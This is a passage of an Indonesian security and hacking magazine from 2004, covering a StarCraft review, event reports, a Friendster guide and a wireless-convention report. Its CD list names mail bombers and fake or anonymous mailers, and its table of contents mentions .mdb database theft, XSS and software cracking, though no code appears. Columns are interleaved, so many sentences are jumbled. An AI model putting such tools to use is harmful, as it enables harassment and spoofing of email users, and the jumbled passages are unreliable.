Anda di halaman 1dari 50

NeoSoft

StartCraft
Intense Real-Time Strategy
StarCraft dari Blizzard Entertainment adalah salah satu game terbaik yang pernah ada (lihat
http://www.blizzard.com/inblizz/awards.shtml#sc). Bagi para pecinta game (gamer) tidak akan
asing dengan game yang satu ini karena game ini sudah beredar di akhir tahun 1998. Walaupun
begitu, sampai sekarang game ini tidak lekang dimakan waktu. Tetap asyik untuk dimainkan
mencoba menjadi penguasa bumi di waktu yang akan datang.

D
i masa yang akan datang (mungkin 10.000 Intense Real-Time Strategy
tahun mendatang), bumi dikuasai 3 spesies Sebagai pemimpin militer untuk spesies anda, maka
yang merupakan generasi penerus dari anda harus bekerja keras menggali sumber daya
kehidupan manusia di muka bumi. Pertentangan dan yang dibutuhkan untuk membangun sarana-sarana
persaingan hadir untuk menjadi penguasa tunggal di pasukan anda hingga membawa mereka menuju
Bumi membuat ke 3 spesies tersebut bekerja keras kemenangan. Itulah tugas utama yang akan anda
untuk mempersiapkan armada tempur. pikul nantinya ketika anda memilih game ini untuk
Begitulah sekelumit cerita yang mendasari game ini. dimainkan.
Walau dipenuhi dengan pertempuran, pertempuran Berat sekali..., tetapi itu itu hanya game. Jika dilihat
yang dilakukan berpedoman kepada misi yang secara bentuknya sebagai sebuah game, mungkin
diemban. Jika menyalahi aturan misi maka anda akan hanya menyajikan sesuatu buat melepas beban
dinyatakan kalah walalupun anda memiliki armada dunia. Tetapi game strategy ini bukanlah sembarang
tempur yang handal. game. Dari nilai pendidikan, game ini mengajak
anda menjadi pemimpin, apakah anda pemimpin
yang baik? Jawabnya adalah mencoba dahulu game
ini. Jadi game ini bukan sekedar pelepas lelah,
malah bahkan dapat menjadi penambah kelelahan
anda karena tuntutan berpikir yang dalam menjadi
kunci kemenangan.

Sistem Yang Dibutuhkan:

Windows 95/98/NT
Pentium 90 or higher
16 MB RAM
DirectX-Compatible SVGA Video Card
Microsoft-Compatible Mouse
Double-Speed CD-ROM

Macintosh
PowerMac or Compatible
16 MB RAM
System 7.6 or higher
256 Color, 640x480 Display or Better
Double-Speed CD-ROM

Jenis-jenis Spesies
Seperti yang telah disebutkan di atas, ada spesies
yang menjadi penerus kehidupan manusia di akan
datang yaitu:
? Terran. Penampilan phisik seperti manusia
adanya, tidak ada perubahan yang berarti pada
spesies ini.
? Protoss. Penampilan phisiknya juga seperti
manusia tetapi juga memiliki unsur hewan,
memiliki kemampuan tidak kalah dengan Terran.
? Zerg. Penampilan phisiknya sudah tidak lagi
menyerupai manusia, kepintaran otak yang
dimiliki sama dengan manusia karena pada
dasarnya merupakan keturunan dari manusia,
bahkan armada tempurnya tidak kalah hebatnya
dengan Terran dan Protoss.
HomePage
Harga NeoTek + CD:

Salam!
Rp20.000,- (P. Jawa)
Rp22.000,- (Luar P. Jawa)

NEOTEK
Dunia Teknologi Baru

Bahaya Email:
Footprinting Dari Spam sampai Virus

Scanning

Enumeration

Gaining Access

Escalating ? Email bagi setiap pengguna internet menjadi penting fungsinya sebagai alat
Privilege berkomunikasi, dibalik itu ada bahaya yang sedang mengintai.

E
mail bukan lagi barang baru karena hampir pengguna
Pilfering internet secara personal, sebuah badan usaha maupun
badan non-usaha menggunakan email sebagai salah
satu cara berkomunikasi kepada teman, saudara, rekan bisnis dan
lain sebagainya. Makin berkembangnya internet, email makin
Covering Tracks marak dengan hadirnya berbagai macam jasa layanan email baik
gratis maupun non-gratis.
Karena perkembangan internet yang pesat tersebut dan
Creating pengguna email sendiri makin bertambah jumlahnya, kini email
Backdoors mulai terancam bahaya yang dilakukan melalui internet dengan
email sebagai korban ataupun email sebagai alatnya.
Kenali email anda dan bahaya-bahaya yang dapat mengancam
Denial of eksistensi email anda.
Service

Bagaimana menghubungi NEOTEK?


Lengkapi pengetahuan hacking
dan PC security anda dengan KONTRIBUSI ARTIKEL
berlangganan majalah NeoTek: redaksi@neotek.co.id ADMINISTRASI IKLAN
Redaksi Tel. 021-5481457 Fax. 021-5329041
SURAT PEMBACA
Hubungi redaksi@neotek.co.id
support@neotek.co.id SIRKULASI NEOTEK
KRISHNAdiSTRIBUTOR Tel. 021-5481457
WEBMASTER
Tel. (021) 5835 0080 webmaster@neotek.co.id ALAMAT REDAKSI
HP. (0816) 1187 111 (Boedi) 4 Cairnhill Rise
PEMASARAN
email: Hedhi Sabaruddin, 0812-1891827 #05-01 The Cairnhill
Singapore 229740
krishnadistributor@neotek.co.id CHATROOM DI DALNET Telp. +65-67386482
Kontak: Boedi Krishnadi #neoteker email: kosasih@indo.net.id
MILIS PARA NEOTEKER
http://groups.yahoo.com/group/majalahneotek

Vol. IV No. 09 NeoTek 1


Daftar Isi
Daftar Isi

NeoTek Vol. IV No. 09


FOKUS
FOKUS VOL.
VOL. IV
IV NO.
NO. 09
09 18 Bahaya Email:
Menanggulangi Spam
Spam bikin pusing, sudah tidak penting
malah memenuhi inbox. Atasi segera....

21 Bahaya Email:
Anti-Spam Windows
Menanggulangi Spam dengan Anti-
Spam Toolkits untuk pengguna Windows.

BAHAYA EMAIL
26 Bahaya Email:
Anti-Spam Linux

Spam - Virus - MailBom


Selain ada untuk Windows, ternyata
ada juga Anti-Spam Toolkits untuk
pengguna Linux.

Bahaya Email:
NeoStart Dari Spam sampai Virus
NeoStyle
12
Mengenal bahaya-bahaya
yang mengancam melalui
7 Friendster:
Sahabat Pena OnLine
email dari Spam sampai
Virus, penting untuk diketahui. 45 Menggabungkan
Beberapa Image (1)
Sahabat pena merambah ke dunia
Dengan Marque Tool, menggabungkan
maya, Friendster salah satu web Bahaya Email: lebih dari satu image untuk menjadi
aplikasi tersebut yang lagi booming!!!.
Ngebom Email Lewat Email image yang memiliki karya seni.

8
Ini bukan teroris walau
Pertemuan Para
Geeks di Denmark 15 terlihat ekstrim, ngebom
email dengan perantara 46 Menggabungkan
Beberapa Image (2)
Para hacker dunia berkumpul di
email. Ternyata benar dapat Dengan Lasso Tool, menggabungkan
Denmark dalam acara workshop wireless.
dilakukan, anda bisa buktikan. lebih dari satu image untuk menjadi
image yang memiliki karya seni.

Situs NeoTek www.neotek.co.id


47 Menggabungkan
Beberapa Image (3)
Jadikan situs NeoTek sebagai pangkalan Anda berselancar Dengan teknik se-level dengan
Link Langsung Layanan Rupa-rupa NeoTek advanced, anda juga dapat melakukan
Kunjungi situs-situs yang dibahas di Channel #neoteker di Dalnet penggabungan lebih dari satu image.
majalah NeoTek dengan sekali klik Ngobrol ramai-ramai sesama NeoTeker
lewat situs NeoTek.
Web Chat Room
Kini tidak usah jauh-jauh untuk ngobrol
NeoTek versi PDF langsung dengan sesama NeoTeker
Kehabisan NeoTek di kota Anda?
Dapatkan saja versi PDF-nya. Gratis! Mailing List
Ini yang paling ramai. Segera ikutan
berbagi pengalaman berinternet!
Download
Tersedia juga download di situs NeoTeker Official Portal
NeoTek selain dari situs aslinya http://www.neoteker.or.id
Situs komunikasi antar Neoteker.
Neoteker Internet Radio
http://dj.neoteker.or.id:8000

2 NeoTek Vol. IV No. 09


Daftar Isi

40 Database Security:
VP-ASP Shopping
Cart
NeoSoft
StarCraft
Salah satu aplikasi shopping cart
yang mengijinkan orang lain yang 0 Intense Real-Time Strategy
tidak memiliki otoritas mengambil fle Military Leader game
.mdb dengan cara men-download-nya dengan skenario Bumi
untuk keuntungan pribadi. dimasa mendatang

41
Web Security:
Memahami XSS NeoProfil
NeoTutor Memahami konsep
penyalahgunaan XSS (Cross Site
Scripting) berhubungan dengan
3
Editorial Office
4 Cairnhill Rise
#05-01 The Cairnhill
29 Computer Forensics: aplikasi keamanan web.
Singapore 229740
Tools pada Linux Telp. +65-67386482
Forensik komputer juga dapat
dilakukan di Linux dengan tool yang 44 Bimetrisc:
Security berdasarkan Business Office
terdapat didalamnya. Karakteristik Biologis Gedung Cahaya Palmerah 503
Ketika Password dan PIN tidak lagi Jl. Palmerah Utara III No. 9

34
Jakarta 11480
Computer Forensics: menjanjikan keamanan. Biometrics
Telp. 021-5481457
Analisa Forensik muncul sebagai pilihan baru dengan
Fax. 021-5329041
Analisa forensik dengan berdasarkan karakteristik biologis
memanfaatkan Galleta dan Pasco dan seperti sidik jari, retina, iris, suara, dan
lain sebagainya yang digunakan untuk Pemimpin Umum
juga dengan menggunakan IE History
teknologi verifikasi personal. Fachri Said
Viewer.
Pemimpin Redaksi

NeoTekno
Kosasih Iskandarsjah
Redaktur Ahli
Onno W. Purbo
Michael S. Sunggiardi
38 Database Security:
Mencegah MDB Pemimpin Usaha
Fahmi Oemar
Download Dadang Krisdayadi
Beberapa shopping Cart yang
menggunakan file .mdb sebagai Redaktur Pelaksana
databasenya terkadang mengijinkan MA Rody Candera
pihak luar untuk men-download-nya. Sekretaris Redaksi
Marni
NeoRagam NeoTek Vol. IV No. 10 Webmaster
Supriyanto
4 Klak Klik
StarCraft
Military Leader Game
Computer Forensics
Kenali bagaimana para cyber cop
Sirkulasi
Hedhi Sabaruddin
Beijing International menangani kasus-kasus kriminalitas
Book Fair 2004 yang melibatkan penggunaan kom- Adm. Langganan
puter serta apa saja tool yang digu- KRISHNAdiSTRIBUTOR
nakannya yang dapat diterima seba-
5 Talkshow NeoTeker Iklan dan Promosi
di Toko-toko Buku gai evidence di pengadilan. Gianto Widianto
Gramedia Se-Jabotabek
Straits Times ComputerMart Cracking Software Keuangan
SunTec City Singapore 8-9 ASProtect adalah software proteksi Aswan Bakri
Oktober 2004 yang paling banyak digunakan selain
Armadillo. Dengan pendekatan Bank
software cracking diharapkan dapat
6 Daftar Isi CD NeoTek Bank BNI
Anti-Spam Windows, Anti- memberikan pemahaman trik proteksi a.n. PT NeoTek Maju Mandiri
Spam Linux, Anti-Spam serta programming yang mendalam. No. rekening 070.001709720.001
MacOS, Enkripsi, Fake Mailer,
Bank BCA Matraman
Forensic Tools, Mail Bomber,
(khusus untuk langganan)
Mail Remover, Mail Server,
a.n. Boedi Krishnadi
Game, Voip Merdeka.
No. rekening 342-239-1611

Vol. IV No. 09 NeoTek 3


NeoRagam

Klak Klik BEIJING INTERNATIONAL BOOK FAIR 2004

GAME BULAN INI K ali ini NeoTek bukan


melaporkan pameran
StarCraft komputer, melainkan pamer-
Thrones and Patriots
an buku, tepatnya Beijing
28 MB International Book Fair
(BIBF) 2004 yang diadakan
Sebagai pemimpin
suatu species, anda dari tanggal 2 September
harus mengumpulkan sampai 6 September 2004.
resources yang diperlukan Tiga hari pertama khusus
untuk membangun kekuat- untuk para pengunjung
an menuju kemenangan. bisnis, sedangkan dua hari
Ada tiga spesies yang terakhir untuk umum. Pe-
dapat dimainkan dalam ngujung diharuskan mem-
game ini: beli tiket, tetapi NeoTek
mendapatkan kartu penge-
nal peserta pameran dari
salah satu stand asing.
Pameran diadakan di ge-
dung tua namun megah
yang merupakan gedung
? Terran yang dibangun oleh Russia
? Protoss di tengah-tengah kota
? Zerg
Beijing. Bahkan restoran
besar dalam kompleks itu Pameran diselenggarakan di Beijing Exhibition Center, suatu gedung
bergaya Russia yang ada di tengah-tengah kota.
merupakan restoran ber-
gaya Russia, tepatnya
Moscow Restaurant. membuat penerbit sendiri, se- Korea, Taiwan, dan HK.
Buku Ilmiah Paling Populer hingga pameran semakin Adapun dari Asia Tenggara
meriah dengan stand-stand hanya ada penerbit Singa-
Secara tradisional, rakyat RRC penerbit buku umum dan pura yang memang ber-
menggemari buku-buku anak-anak. usaha memasarkan buku-
ilmiah, khususnya matema- Peserta Asing buku sekolahnya yang me-
tika, fisika, dan kimia. Tidak mang menggunakan Baha-
heran apabila kita lihat para Stand asing dari penerbit sa Mandarin simplified
penerbit buku ilmiah, khu- internasional hampir se- character yang sama de-
susnya University Press mem- mua membawakan produk ngan yang digunakan di
punyai stand yang megah ilmiah seperti buku teks RRC.
dan galmour, seperti layaknya dan jurnal ilmiah.
Atmosfer Pameran
para penerbit buku umum di Adapun buku umum dan
negara lain. anak-anak dan remaja ke- Ramai dan bising, yang
banyakan dibawakan oleh walaupun untuk bisnis,
Baru-baru ini saja di RRC masih sangat terasa kenal
swasta diperbolehkan para penerbit dari Jepang,
pendekatan publiknya.

Win 95/98/NT
DirectX 2.0
Pentium 90 MHz or higher
16 MB RAM
Direct-X compatible SVGA videocard
Microsoft compaible mouse
4x CD ROM drive

Bidang matematika, fisika, dan kimia secara tradisional merupakan bahan


bacaan yang paling populer di RRC, sehingga tidak heran apabila Univer-
sity Press stand-nya lebih glamour dibandingkan penerbit-penerbit buku
umum. Ada pameo yang mengatakan bahwa bisnis yang paling meng-
untungkan di RRC adalah pabrik bir dan yang kedua adalah penerbit buku.,
maka tidak heran apabila kantor pos di sana juga tidak mau ketinggalan
menangguk keuntungan.

4 NeoTek Vol. IV No. 09


NeoRagam

TALKSHOW NEOTEKER DI TOKO-TOKO BUKU GRAMEDIA SE-JABOTABEK

M ulai September 2004,


NeoTek bersama ke-
karyawan swasta maupun
lembaga pemerintah.
cukup mic yang dihubung-
kan ke sistem audio toko
Jadwal Talkshow
Berikut adalah cuplikan jad-
lompok studi Neoteker Acara ini pada awal-awal- buku, sehingga sambil wal talkshow:
mengadakan talkshow di nya membuat para pengun- memilih-milih buku yang
toko-toko buku Gramedia ingin dibeli, pengunjung 3/9/04 Bintaro
jung toko buku terheran- Hacker Overview
se-Jabotabek, dimulai di TB heran dan ragu-ragu untuk tetap dapat mengikuti talk-
Gramedia Bintaro, tanggal mendekat. Namun pada show yang mirip talkshow 4/9/04 Daan Mogot
3 September 2004, pk 14.00 radio ini. Anatomi Proses Hacking
hari-hari berikutnya sema-
dengan topik Hacker Over- kin ramai dan tempat du- Bahan dari NeoTek Pluit
view. duk yang disediakan pun
Psikologis Hacking
Bahan-bahan talkshow ada- 5/9/04 Pluit
Rutin Akhir Minggu penuh ditempati dengan lah topik-topik yang pernah Unicode Bug
Acara ini diadakan secara banyak pengunjung lainnya atau akan dibahas di maja-
harus menyaksikan dengan Depok
rutin setiap hari Jum’at, lah NeoTek, yang umum- SQL Injection
Sabtu, dan Minggu, meng- berdiri. nya adalah seputar compu- Cempaka Mas
ingat para Neoteker yang Acara gratis ini diadakan ter security dan hacking, Fingerprint Port 80
merupakan para penggemar secara sederhana saja. Tidak topik-topik yang tidak per-
10/9/04 Matraman
computer security adalah ada peralatan seperti laptop nah basi dan selalu menarik Bahaya Email
pelajar, mahasiswa, ataupun ataupun proyektor disini, perhatian.

Talkshow Neoteker di berbagai toko buku Gramedia se-Jabotabek toko me-


ngenai keamanan berkomputer. Samurai_Hack sedang berteori diamati
oleh Odyxb (kiri). Bung Ftp_Geo dan Fuzk3 (atas) sedang asyik berbagi
ilmu yang dimiliki (tentang SMS Hacking dan SQL Injection?).

STRAITS TIMES COMPUTERMART SUNTEC CITY SINGAPORE 8-9 OKTOBER 2004

B ukan cuma Kompas ko-


ran yang memuat aktif
curkan Xbox Live di negara
pulau ini.
menyelenggarakan pameran
(seperti halnya pameran seluler MMCard untuk Ponsel
21-25 Juni 2004, di Singapote Salah satu yang menarik ada-
juga demikian. The Straits Times lah stand Fuji Film yang bukan
menyelenggarakan computermart saja memamerkan kamera di-
yang sejalan dengan iklan baris- gital FinePix-nya, melainkan
nya (classified ads). juga berbagai macam media,
termasuk multimedia card un-
Kecil Tapi Ramai tuk ponsel seperti yang digu-
Pameran yang diselenggarakan nakan pada model-model pon-
bersamaan dengan iklan baris ini sel dengan Symbian OS (misal-
hanya menggunakan satu hall di nya Nokia 3650, 3660, 7650).
Suntec City Exhibition Center, Nokia 3650 dengan MM Card
jauh lebih kecil dari pameran ‘standar’ 16 Mbyte dapat di-
komputer sejenis seperti Comex upgrade menjadi 128 Mbyte
yang sampai menggunakan em- dengan biaya SGD55, cuma
pat buah hall sekaligus. sedikit lebih mahal dari flash
Namun kecil bukan berarti ti- disk yang harganya kini har-
dak ramai. Ada juga pertan- ganya SGD39 untuk kapasitas
dingan Xbox yang tentunya yang sama.
disponsori Microsoft. Bung Odyxb membeli kalung
Microsoft lumayan berhasil di Flash Disk 256Mbyte merk
Singapore dan sudah melun- Umax seharga SGD55 saja.

Vol. IV No. 09 NeoTek 5


NeoRagam

daftar isi cd neotek


ANTI SPAM WINDOWS GhostMail gm51.exe
EllaforOutlook ella.exe McSpam McSPammer.zip
EmailSecurity emlsec.zip McSyn mcsyn.exe
GFImailessential mailessential.exe Neo-Forger Neo-Forger.exe
Ihate Server Edition ihsee55.msi Phasma phasma20f.zip
IhateSpam ihatespam.exe QuickFyre quickfyre.zip
KnockKnock kkv20.zip Sabotage sabotage.zip
LyrisMailshield mailshield300t.exe ShadowMailer Shadow-mailer-1.2.zip
POPfile popfile-0.20.1.zip TVXanonyMailer TVX-anonymous-mailer-1.zip
popfile-0.20.1a-windows.zip FORENSIC TOOLS
SpamBayes SpamBayes.exe BinText30 bintext.zip
SpamButcher spambutcher.exe CyberDetective433 Cyber Detective v4.33.rar
SpamCatcher scuniversal2k.exe FTK20 ForensicToolkit20.zip
scuniversal98.exe Galleta galleta.zip
spamcathcersetup.exe NTLast30 ntlast30.zip
SpamDetective spamdetective208.exe Pasco pasco.zip
SpamFighter spamfighter.exe Patchit20 pachit.zip
SpamHilator spamihilator.exe Rifiuti rifiuti.zip
SpamInspector spamInspector.exe ShoWin20 showin.zip
SpamNet SpamNet2.3.4.exe Vision10 visionsetup.exe
SpamNetOE_Beta.exe MAIL BOMBER
SpamPal spampal-1.53.exe 1stMailBomberPro bombpro.zip
ANTI SPAM LINUX DeathnDestruct dnd40.zip
Active Spam Killer ask-2.4.1-1.noarch.rpm eCampaign33 ecamp.exe
ask-2.4.1.tar.gz Euthanasia euthan15.zip
ask_2.4.1-1_all.deb FearMail Fearmail.zip
BlackHole BlackHole-1.0.1.tar.gz FstMailer fstmail031212.zip
BogoFilter-Current bogofilter-0.92.7-1.i586.rpm HackTek11 hacktek.zip
bogofilter-0.92.7-1.src.rpm MailBomb maibomber.zip
bogofilter-0.92.7.tar.gz MailBomber91 bomber.zip
bogofilter-0.92.7.tar.bz2 NeoBomber Neo-Bomber.exe
bogofilter-static-0.92.7-1.i586.rpm ShortyMB smb1001.rar
BogoFilter-Stable bogofilter-0.92.6-1.i586.rpm TurboMB turbo_mail_boomber11.zip
bogofilter-0.92.6-1.src.rpm WarSuite WarSuite.exe
bogofilter-0.92.6.tar YetAno yaemb15.zip
bogofilter-0.92.6.tar.bz2 MAIL REMOVER
bogofilter-static-0.92.6-1.i586.rpm eremover email_remover.zip
Dspam dspam2.11.0.tar.gz MailsSweep ms.zip
JunkMailBufferAgent jmba0.3.0.tar.gz MAIL SERVER
MailScanner MailScanner-4.25-14.rp#535D8.gz FreeSMTP freesmtp040110.zip
MailScanner-4.25-14.rpm.tar.gz PakPos212Public PakPos212Public.zip
MailScanner-4.25-14.su#535DA.gz PostCast_SMTP setup.exe
MailScanner-4.25-14.suse.tar.gz QuickSendMail qsend.zip
MailScanner-4.25-14.ta#535DC.gz TheBat the_bat.exe
MailScanner-4.25-14.tar.gz GAME
MailScanner.tgz StarCraft scdemo.exe
MessageWall messagewall-1.0.8.tar.gz
Milter Virus miltervirus1.9.1.tar.gz VOIP MERDEKA (H.323)
PostArmor PostArmorUnix_13.tgz Gatekeeper Windows gk-2.0.2-windows-bin.zip
PostArmorX_13.dmg Netmeeting 3.01 NM30.exe
PyhtonMilter milter0.6.5.tar.gz Gatekeeper Mandrake 8.0 gk-2.0a-linux-bin.zip
QSF qsf-1.0.14-1.i386.rpm Gatekeeper Mandrake 9.0 gk-2.0.2-linux-bin.zip
qsf-1.0.14.tar.gz GnomeMeeting Mandrake 3 files
qsf-mysql-1.0.14-1.i386.rpm GnomeMeeting source gnomemeeting-0.9.41.tar.gz
qsf-sqlite-1.0.14-1.i386.rpm VOIP SOFTPHONE (SIP)
SpamBayes spambayes-1.0a7.tar.gz SJPhone Windows SJphone-248.exe
SpamBouncer sb.tar.gz, sb.tar.Z SJPhone Linux SJphoneLNX-235a.tar.gz
SSpamM sspamm0.2.tgz SJPhone MacOS SJphoneMAC-235a.dmg
Vipuls Razor razor-agents-2.36.tar.gz Phone PPC2002 SJphone-PPC2002-234a.cab
SJphone-PPC2002-234a.exe
razor-agents-2.40-bet#53604.tar Phone PPC2003 SJphone-PPC2003-234a.cab
ANTI SPAM MAC OS SJphone-PPC2003-234a.exe
POPMonitorX popmonitor_213.sea X-lite X_lite-Xten-Win32-1103m.exe
popmonitor_213x KPhone402 kphone-4.0.2.tar.gz
SpamFire spamfire143os9.sit-link
spamfire143osx.sit-link VOIP ASTERISK
ENKRIPSI asterisk asterisk-1.0.1.tar
PGPFreeware703 PGPFW703.zip addons asterisk-addons-1.0.1.tar.gz
PrivateIdaho PrivatIdoho.exe sounds asterisk-sounds-1.0.1.tar.gz
StealthAnonymizer StealtherAnonymizer.exe devel ec.tar.gz
SteganosSuite Streganos3Suite.exe h323 asterisk-oh323-0.2.tar.gz
FAKE MAILER LAIN-LAIN
AnonyMailer Anonumous_e-mail.zip Norton Anti Virus 2004 nortonantivirus2004_in.exe
AnonyMailMaster amailm10.zip Update NAV2004 20041016-003-i32.exe
DeathAnony DeathAnonymous.zip Hopster HopsterSetup.exe
eMailer emailer.rar WinXP Service Pack 2 WindowsXP-KB835935-SP2-ENU.exe
WS_FTPLE WS_FTPLE.exe

6 NeoTek Vol. IV No. 09


NeoStart

FRIENDSTER D
UNIA ONLINE SUDAH MEWABAH DI
mana-mana sehingga sahabat pena
online juga sudah ada, Friendster
salah satunya. Sistim yang dipakai yaitu

SAHABAT PENA Personal Network Connected, itu berarti


kita bisa mendapat banyak teman dari
mana saja.

ONLINE Anggotanya saat ini sudah mencapai ribu-


an orang dan apakah anda adalah salah sa-
tunya?
Bagi yang belum ikutan, buruan dikejar
Sahabat pena... mungkin itu tidak asing lagi di telinga kita, tuh. Kan gak asyik kalo ketinggalan.
tapi apa sudah pada tahu semua dengan yang namanya Apa dan bagaimana Friendster, silakan ba-
Friendster? Friendster adalah sahabat pena online, ayo ca bahasan berikut di bawah, jika sudah
mengerti jangan lupa nanti gabung ke
simak yang berikut ini NeoTek Friendster ya...

Friendster, media sahabat online yang mengasyikkan...

KUNJUNGI SITUSNYA!!! DAFTAR UPLOAD PHOTO


1 Masih penasaran dengan yang
namanya Friendster? Sebaiknya
2 Jika ingin ikutan, daftar dengan
meng-klik tombol Login yang
3 Jika anda telah memiliki account
sebagai member, selanjutnya ada-
anjangsana situs resmi Friendster ada di bagian bawah ketika lah meng-upload photo yang an-
yang memiliki domain/alamat membuka situsnya. Seperti bia- da miliki agar orang-orang yang
www.friendster.com sa, jika mendaftar nantinya akan anda ajak berteman bisa
diwajibkan mengisi formulir melihat langsung foto anda.
pendaftaran yang telah
disediakan.

SEND MESSAGE ADD FRIEND GRATIS BOW!!!


4 Ketika menemukan orang yang
cocok untuk menjadi teman anda,
5 Beda jika anda tahu email yang
digunakannya maka akan terlihat
6 Friendster tidak memungut biaya
untuk bergabung, jadi kalau ada
segera add, tetapi anda di harus- tampilan di atas, jika begitu anda email yang meminta anda mengi-
kan mengetahui email yang digu- tinggal klik tombol Add yang ada rim uang sebagai pajak Friendster,
nakan orang tersebut sebagai ac- dibawah. dicuekin aja karena sudah mulai
count di friendster. Jika tidak tahu, tuh Hoax merambah Friendster
sebaiknya send message saja.

Vol. IV No. 09 NeoTek 7


NeoStart

NmN
Neoteker menjawab Neoteker
Forum ini dimaksudkan sebagai bentuk offline dari mailing list
NeoTek di http://groups.yahoo.com/group/majalahneotek.

Posted September 8, 2004


Pertemuan Para Geek & Wireless
Network Hacker di Djursland
Denmark September 2004
Saya kebetulan diundang oleh rekan
saya, Sebastian Buettrich dan Tomas
Krag dari wire.less.dk untuk mengha-
diri, berpartisipasi dan memberikan
workshop di Freifunk Free Network
Convention yang diadakan di Djurs-
land Denmark yang berlokasi sekitar
empat jam perjalanan darat dari Copen-
hagen. Yang kami lakukan silakan lihat
di http://thewirelessroadshow.org dan
masuk ke link WirelessforDevelopment
di dalamnya.
Berangkat menggunakan Thai Airway
selama total 14 jam terbang, transit me-
Pintu masuk gedung konvensi.
lalui Singapore dan Bangkok, akhirnya
saya tiba di Copenhagen tanggal 2 yang dapat memberikan penghasilan
September di pagi hari. Setelah salah lebih baik.
mengambil kereta api, dan kesasar Dengan kondisi yang sangat miskin ini,
hampir setengah pulau, dilanjutkan segelintir orang dimotori oleh Barjke
salah mengambil jalur bus, akhirnya mereka membangun jaringan Internet
Sebastian Buettrich berhasil menemu- wireless menggunakan teknologi yang
kan saya dan kami berjalan kaki ke tidak berbeda jauh dengan apa yang
markas wire.less.dk. kita gunakan di Indonesia. Kaleng susu
menjadi andalan utama antenna di
Suasana Konvensi
rumah-rumah. Mereka bahkan mem-
Sore hari tanggal 2 September 2004, produksi secara serius dengan ukuran
kami berangkat ke tempat acara di yang benar.
Djursland, Denmark. Lokasi Djursland
Secara umum acara konvensi wireless
di wilayah yang tidak terlalu produktif di Djursland lebih tepat di katakan
di Denmark, penghasilan utama dari
tempat pertemuan para geek, para wi-
ladang dan pertanian. Konsekuensinya reless hacker. Jangan kaget kalau pa-
penduduk tidak terlalu kaya. Banyak
kaian kami rata-rata kumal, rambut
penduduk yang pandai meninggalkan gondong, celana jeans, baju kaos.
Djursland untuk bekerja di kota-kota Geek at work.

Suasana camping dalam Freifunk Free Network Convention di Djursland, Denmark.

8 NeoTek Vol. IV No. 09


NeoStart

Tapi semua rata-rata membawa laptop- Terus terang, harus di akui memang rak-
nya masing-masing, tersambung ke yat menggunakan frekuensi tanpa ijin.
jaringan wireless dengan Access Point Bukan karena rakyat tidak tahu aturan,
yang bertebaran di mana-mana pada tapi rakyat invest peralatan wireless
frekuensi 2.4GHz - tentunya tanpa internet ini karena industri telekomu-
perlu ijin frekuensi dari POSTEL. nikasi tidak sanggup memberikan servis
Untuk mengirit biaya, sebagian peserta broadband murah kepada rakyat.
terutama yang datang dari Berlin Jer- Proses mendanai diri sendiri tidak ter-
man Barat yang merupakan salah satu gantung pada bank dunia, ADB, IMF
kontingen yang paling besar, membuat maupun bantuan donor dengan kon-
tenda di lapangan untuk tidur mereka. disi pemerintah yang tidak memihak
Berbagai foto yang menggambarkan pada rakyat banyak membuat kaget
suasana konvensi dapat diambil di dan kagum rekan-rekan dari 30 negara
http://thewirelessroadshow.org. yang hadir pada konvensi tersebut.
Saya sangat menyarankan bagi anda Akibatnya, salah satu usulan dalam
untuk melihat-lihat foto-foto selama konvensi Freifunk ini adalah meng-
konvensi, untuk melihat bagaimana adakan wireless workshop di Indonesia
ceria-nya para geek dan wireless tahun 2005 atau 2006 mendatang.
network hacker yang bekerja sama Mereka, banyak negara di dunia, sa-
membangun jaringan, dan bertukar ngat tertarik sekali untuk belajar dari
ilmu dan pengalaman. perjuangan bangsa Indonesia. Mereka Men-setup Mesh Network.
ingin mengetahui resep yang diguna-
Wireless for Development kan bangsa Indonesia untuk meraih sekali. Bentuk jaringan bukan star yang
Saya berkesempatan berkontribusi di kemerdekaannya di dunia Internet. terpusat seperti pada Access Point, tapi
beberapa sesi, seperti sesi bagi pemula Mereka ingin teman-teman yang lain mesh karena antar node saling tolong
(beginner). Di sesi ini saya bersama di dunia juga merasakan merdeka. menolong untuk merelay paket ke
Carlo dari Italia memberikan gambar- Ada beberapa hal yang menarik untuk tujuan. Protocol yang memungkinkan
an kepada para pemula tentang bagai- jaringan wireless mesh ini beroperasi
di simak dari konvensi wireless net-
mana kerja dari wireless network. work di Djursland, Denmark ini. adalah OLSR, dapat diambil dari
http://www.olsr.org.
Yang agak mengagetkan bagi saya pri- Beberapa diantara akan di jelaskan
badi, Sebastian meminta saya untuk berikut ini. Dari indowli@yahoogroups.com, di-
memberikan ceramah di muka semua ketahui bahwa ternyata di Cempaka
peserta bersama Dave yang menama- Mesh Network Putih, tepatnya di Universitas Yarsi,
kan dirinya Cursor Cowboy dari Ame- Mesh network yang dimotori oleh Jakarta dengan dimotori Pak Yadi, saat
rika Serikat. Berbeda dengan Dave yang rekan-rekan Berlin Wireless FreiFunk ini telah beroperasi jaringan mesh
memang banyak pengalaman praktis- barangkali merupakan salah satu pri- wireless menggunakan mesh.
nya, tapi tidak banyak melakukan madona dalam konvensi ini. Dengan
community development dan empo- menggunakan mesh network, kita da- Ronja pada Frekuensi TeraHertz
werment. pat membangun jaringan wireless tan- Yang menarik dan banyak dibicarakan
pa memerlukan Access Point yang besar, orang selama konvensi adalah inisiatif
Apa yang saya jelaskan pada kesem-
tower yang tinggi. yang dimotori rekan-rekan di Chez
patan tersebut berjudul "It's NOT untuk membangun dan membuat sen-
Illegal, It's just NOT legal (Richard Jaringan wireless dapat dibangun meng-
diri jaringan komputer di kota mereka
Fuchs, IDRC)." gunakan peralatan wireless yang kecil menggunakan laser (cahaya) antar-ge-
Saya menjelaskan bagaimana perjuang- saja, tapi saling tolong menolong,
dung. Teknologi ini dinamakan Ronja
an bangsa Indonesia untuk dapat mem- saling relay antara alat untuk memba- dan semua tekniknya tersedia gratis di
bangun infrastruktur Internet-nya ngun jaringan yang besar.
http://ronja.twibright.com. Kecepatan
dibawah represi pemerintah dan aparat Peralatan wireless pada mesh network data sekitar 10Mbps, untuk jarak 1-2 km.
yang tidak berpihak pada rakyat, bahkan bekerja pada mode Ad-Hoc, artinya
di-sweeping dan diambil peralatannya. tidak menggunakan Access Point sama Yang menarik di teknologi komunikasi
menggunakan laser/optik karena fre-

Onno W. Purbo dalam sesi Wireless for Development. Experimental transmitter Ronja.

Vol. IV No. 09 NeoTek 9


NeoStart

Beberapa model mekanis Ronja yang sudah terpasang di berbagai lokasi di Chez.

Membuat Antena Sendiri mulai membuat sendiri antenna-nya.


Bagian yang paling menarik selama kon- Ada dua jenis antenna yang dibuat
vensi ini adalah pada saat di adakan sesi pada kesempatan ini, yaitu, antena
